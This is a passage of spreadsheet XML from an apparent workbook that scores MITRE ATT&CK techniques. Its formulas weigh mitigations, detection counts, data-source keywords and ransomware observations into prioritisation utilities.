        <f t="array" ref="AD451">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC451)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE451" s="25">
        <f>IF(AD451="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF451" s="25" t="str" cm="1">
        <f t="array" ref="AF451">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC451)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG451" s="25">
        <f>IF(AF451="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH451" s="25" t="str" cm="1">
        <f t="array" ref="AH451">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC451)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI451" s="25">
        <f>IF(AH451="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ451" s="25" t="str" cm="1">
        <f t="array" ref="AJ451">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC451)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK451" s="25">
        <f>IF(AJ451="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL451" s="25" t="str" cm="1">
        <f t="array" ref="AL451">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC451)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM451" s="25">
        <f>IF(AL451="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN451" s="60">
        <v>0</v>
      </c>
      <c r="AO451" s="51">
        <v>0</v>
      </c>
      <c r="AP451" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.4566666666666665E-2</v>
      </c>
      <c r="AQ451" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>4.8555555555555553E-2</v>
      </c>
      <c r="AR451" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>4.8555555555555553E-2</v>
      </c>
      <c r="AS451" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT451" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU45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52" spans="1:47">
      <c r="A452" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.3120952380952381E-2</v>
      </c>
      <c r="B452" s="25">
        <f>SUM(H452,M452,V452)*(1+SUM(AE452,AG452,AI452,AK452,AM452))</f>
        <v>0.1312095238095238</v>
      </c>
      <c r="C452" s="25" t="s">
        <v>1677</v>
      </c>
      <c r="D452" s="25" t="s">
        <v>1678</v>
      </c>
      <c r="E452" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F452" s="51">
        <v>1</v>
      </c>
      <c r="G452" s="51">
        <v>1</v>
      </c>
      <c r="H452" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I452">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J452">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K452">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L452">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M452" s="25">
        <v>0</v>
      </c>
      <c r="N452" s="51">
        <v>0</v>
      </c>
      <c r="O452" s="51">
        <v>1</v>
      </c>
      <c r="P452" s="51">
        <v>1</v>
      </c>
      <c r="Q452" s="51">
        <v>0</v>
      </c>
      <c r="R452" s="51"/>
      <c r="S452" s="51">
        <v>0</v>
      </c>
      <c r="T452" s="51"/>
      <c r="U452" s="51">
        <v>0</v>
      </c>
      <c r="V452" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>9.5238095238095229E-3</v>
      </c>
      <c r="W452">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X452">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y452">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z452">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>2</v>
      </c>
      <c r="AA452">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.02</v>
      </c>
      <c r="AB452">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.02</v>
      </c>
      <c r="AC452" s="29" t="s">
        <v>1679</v>
      </c>
      <c r="AD452" s="25" t="str" cm="1">
        <f t="array" ref="AD452">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC452)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE452" s="25">
        <f>IF(AD452="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF452" s="25" t="str" cm="1">
        <f t="array" ref="AF452">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC452)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG452" s="25">
        <f>IF(AF452="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH452" s="25" t="str" cm="1">
        <f t="array" ref="AH452">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC452)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI452" s="25">
        <f>IF(AH452="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ452" s="25" t="str" cm="1">
        <f t="array" ref="AJ452">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC452)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK452" s="25">
        <f>IF(AJ452="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL452" s="25" t="str" cm="1">
        <f t="array" ref="AL452">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC452)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AM452" s="25">
        <f>IF(AL452="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN452" s="61">
        <v>0</v>
      </c>
      <c r="AO452" s="51">
        <v>0</v>
      </c>
      <c r="AP452" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.3120952380952381E-2</v>
      </c>
      <c r="AQ452" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>4.3736507936507935E-2</v>
      </c>
      <c r="AR452" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>4.3736507936507935E-2</v>
      </c>
      <c r="AS452" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT452" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU45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53" spans="1:47">
      <c r="A453" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.0952380952380953E-2</v>
      </c>
      <c r="B453" s="25">
        <f>SUM(H453,M453,V453)*(1+SUM(AE453,AG453,AI453,AK453,AM453))</f>
        <v>0.10952380952380952</v>
      </c>
      <c r="C453" s="25" t="s">
        <v>1680</v>
      </c>
      <c r="D453" s="25" t="s">
        <v>1681</v>
      </c>
      <c r="E453" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F453" s="51">
        <v>1</v>
      </c>
      <c r="G453" s="51">
        <v>1</v>
      </c>
      <c r="H453" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I453">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J453">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K453">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L453">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M453" s="25">
        <v>0</v>
      </c>
      <c r="N453" s="51">
        <v>0</v>
      </c>
      <c r="O453" s="51">
        <v>2</v>
      </c>
      <c r="P453" s="51">
        <v>0</v>
      </c>
      <c r="Q453" s="51">
        <v>0</v>
      </c>
      <c r="R453" s="51"/>
      <c r="S453" s="51">
        <v>0</v>
      </c>
      <c r="T453" s="51"/>
      <c r="U453" s="51">
        <v>0</v>
      </c>
      <c r="V453" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>9.5238095238095229E-3</v>
      </c>
      <c r="W453">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X453">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y453">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z453">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>2</v>
      </c>
      <c r="AA453">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.02</v>
      </c>
      <c r="AB453">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.02</v>
      </c>
      <c r="AC453" s="29" t="s">
        <v>341</v>
      </c>
      <c r="AD453" s="25" t="str" cm="1">
        <f t="array" ref="AD453">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC453)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE453" s="25">
        <f>IF(AD453="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF453" s="25" t="str" cm="1">
        <f t="array" ref="AF453">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC453)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG453" s="25">
        <f>IF(AF453="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH453" s="25" t="str" cm="1">
        <f t="array" ref="AH453">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC453)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI453" s="25">
        <f>IF(AH453="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ453" s="25" t="str" cm="1">
        <f t="array" ref="AJ453">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC453)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK453" s="25">
        <f>IF(AJ453="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL453" s="25" t="str" cm="1">
        <f t="array" ref="AL453">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC453)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM453" s="25">
        <f>IF(AL453="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN453" s="60">
        <v>0</v>
      </c>
      <c r="AO453" s="51">
        <v>0</v>
      </c>
      <c r="AP453" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.0952380952380953E-2</v>
      </c>
      <c r="AQ453" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>3.650793650793651E-2</v>
      </c>
      <c r="AR453" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>3.650793650793651E-2</v>
      </c>
      <c r="AS453" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT453" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU45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54" spans="1:47">
      <c r="A454" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.9285714285714285E-2</v>
      </c>
      <c r="B454" s="25">
        <f>SUM(H454,M454,V454)*(1+SUM(AE454,AG454,AI454,AK454,AM454))</f>
        <v>5.9523809523809527E-2</v>
      </c>
      <c r="C454" s="25" t="s">
        <v>1682</v>
      </c>
      <c r="D454" s="25" t="s">
        <v>1663</v>
      </c>
      <c r="E454" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F454" s="51">
        <v>0</v>
      </c>
      <c r="G454" s="51">
        <v>1</v>
      </c>
      <c r="H454" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I454">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J454">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K454">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L454">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M454" s="25">
        <v>0</v>
      </c>
      <c r="N454" s="51">
        <v>0</v>
      </c>
      <c r="O454" s="51">
        <v>2</v>
      </c>
      <c r="P454" s="51">
        <v>0</v>
      </c>
      <c r="Q454" s="51">
        <v>0</v>
      </c>
      <c r="R454" s="51"/>
      <c r="S454" s="51">
        <v>0</v>
      </c>
      <c r="T454" s="51"/>
      <c r="U454" s="51">
        <v>0</v>
      </c>
      <c r="V454" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>9.5238095238095229E-3</v>
      </c>
      <c r="W454">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X454">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y454">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z454">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>2</v>
      </c>
      <c r="AA454">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.02</v>
      </c>
      <c r="AB454">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.02</v>
      </c>
      <c r="AC454" s="29"/>
      <c r="AD454" s="25" t="str" cm="1">
        <f t="array" ref="AD454">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC454)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE454" s="25">
        <f>IF(AD454="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF454" s="25" t="str" cm="1">
        <f t="array" ref="AF454">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC454)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG454" s="25">
        <f>IF(AF454="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH454" s="25" t="str" cm="1">
        <f t="array" ref="AH454">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC454)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI454" s="25">
        <f>IF(AH454="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ454" s="25" t="str" cm="1">
        <f t="array" ref="AJ454">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC454)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK454" s="25">
        <f>IF(AJ454="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL454" s="25" t="str" cm="1">
        <f t="array" ref="AL454">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC454)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM454" s="25">
        <f>IF(AL454="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN454" s="60">
        <v>1</v>
      </c>
      <c r="AO454" s="51">
        <v>1</v>
      </c>
      <c r="AP454" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.9285714285714285E-2</v>
      </c>
      <c r="AQ454" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.9841269841269844E-2</v>
      </c>
      <c r="AR454" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.9841269841269844E-2</v>
      </c>
      <c r="AS454" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT454" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU45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55" spans="1:47">
      <c r="A455" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.9523809523809529E-3</v>
      </c>
      <c r="B455" s="25">
        <f>SUM(H455,M455,V455)*(1+SUM(AE455,AG455,AI455,AK455,AM455))</f>
        <v>5.9523809523809527E-2</v>
      </c>
      <c r="C455" s="25" t="s">
        <v>1683</v>
      </c>
      <c r="D455" s="25" t="s">
        <v>1626</v>
      </c>
      <c r="E455" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F455" s="51">
        <v>0</v>
      </c>
      <c r="G455" s="51">
        <v>1</v>
      </c>
      <c r="H455" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I455">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J455">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K455">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L455">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M455" s="25">
        <v>0</v>
      </c>
      <c r="N455" s="51">
        <v>0</v>
      </c>
      <c r="O455" s="51">
        <v>2</v>
      </c>
      <c r="P455" s="51">
        <v>0</v>
      </c>
      <c r="Q455" s="51">
        <v>0</v>
      </c>
      <c r="R455" s="51"/>
      <c r="S455" s="51">
        <v>0</v>
      </c>
      <c r="T455" s="51"/>
      <c r="U455" s="51">
        <v>0</v>
      </c>
      <c r="V455" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>9.5238095238095229E-3</v>
      </c>
      <c r="W455">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X455">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y455">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z455">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>2</v>
      </c>
      <c r="AA455">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.02</v>
      </c>
      <c r="AB455">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.02</v>
      </c>
      <c r="AC455" s="29"/>
      <c r="AD455" s="25" t="str" cm="1">
        <f t="array" ref="AD455">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC455)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE455" s="25">
        <f>IF(AD455="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF455" s="25" t="str" cm="1">
        <f t="array" ref="AF455">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC455)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG455" s="25">
        <f>IF(AF455="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH455" s="25" t="str" cm="1">
        <f t="array" ref="AH455">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC455)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI455" s="25">
        <f>IF(AH455="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ455" s="25" t="str" cm="1">
        <f t="array" ref="AJ455">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC455)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK455" s="25">
        <f>IF(AJ455="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL455" s="25" t="str" cm="1">
        <f t="array" ref="AL455">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC455)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM455" s="25">
        <f>IF(AL455="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN455" s="52">
        <v>0</v>
      </c>
      <c r="AO455" s="51">
        <v>0</v>
      </c>
      <c r="AP455" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.9523809523809529E-3</v>
      </c>
      <c r="AQ455" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.9841269841269844E-2</v>
      </c>
      <c r="AR455" s="25">
